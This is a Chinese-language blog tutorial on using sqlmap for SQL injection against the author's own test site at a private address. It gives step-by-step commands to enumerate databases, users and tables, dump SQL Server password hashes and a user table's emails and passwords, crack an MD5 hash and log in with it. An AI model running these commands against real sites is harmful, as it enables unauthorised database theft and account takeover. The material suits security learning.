3个月前 (07-18)  网站建设 |   抢沙发  8 
文章评分 3 次,平均分 5.0

今儿跟大伙开始讲解sqlmap的入门操作,大神就可以走了,小白留下认真听讲。

PS:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。博主以自建网站为例为大家讲解。

一、我们来测试注入点是否可用

双击我们上上节课创建好的快捷方式:sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

参数:-u指定注入点url

输出结果:

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

注入结果翻译:

(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web服务器系统为windows 2003 or XP

(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER 2000

其中图一有若干询问语句,需要用户输入[Y/N],如果你不懂这一步如何操作的话可以让程序自动输入,只需添加一个参数即可,命令如下:

sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

二、开始暴库

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs

参数:--dbs:dbs  注意这个参数前面是有两个横杠的!!!

输出结果:

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

该sqlserver中共包含7个可用的数据库。

三、定位web网站当前使用的数据库

sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

四、获取web网站数据库使用账户

sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

五、打出sqlserver所有用户

sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

六、获取数据库账户与密码

sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

七、列出数据库中的表

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

参数:

-D:指定数据库名称

--tables:列出表

结果:

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

可见库中共有34张表。

八、获取表中字段

sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns

参数:

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

结果:

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

如上图userb表中包含了23条字段。

九、暴字段内容

sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

参数:

-C :指定要暴的字段

--dump:将结果导出

结果:

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

对于字段过多的表,我们可以指定导出特定范围的字段内容,命令如下:

sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

参数:

--start:指定开始的行

--stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

结果如下:

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

十、测试我们渗透获取的结果

查看上图结果看到其中的一个用户信息为:

email:123456@qq.com

username: 1.asp

password: 49ba59abbe56e057

通过md5解密,得到该hash的原文密码为:123456

拿到账号密码我们来测试是否可以登录,登录结果如下:

sqlmap渗透工具如何入门?如何用sqlmap做渗透测试基础教程

这就是简单的利用sqlmap渗透web网站的基本操作。主要只掌握sql注入点,找到那些地方可以注入,对症下药,这样才能发挥出sqlmap的最大作用。才能检测我们web网站的sql注入漏洞在哪里。

好了,这期博主简单介绍了sqlmap的基本用法及参数实操。如果大家对系统安全方面比较感兴趣的话,博主后面还会给大家带来渗透的一些进阶内容。

 

除特别注明外,本站所有文章均为叶荣添原创,转载请注明出处来自https://www.wzxiaolou.com/308.html

关于

发表评论

表情 格式

暂无评论

切换注册

登录

忘记密码 ?

切换登录

注册

您是第 2175 位访客, 您的IP是:[35.168.62.171]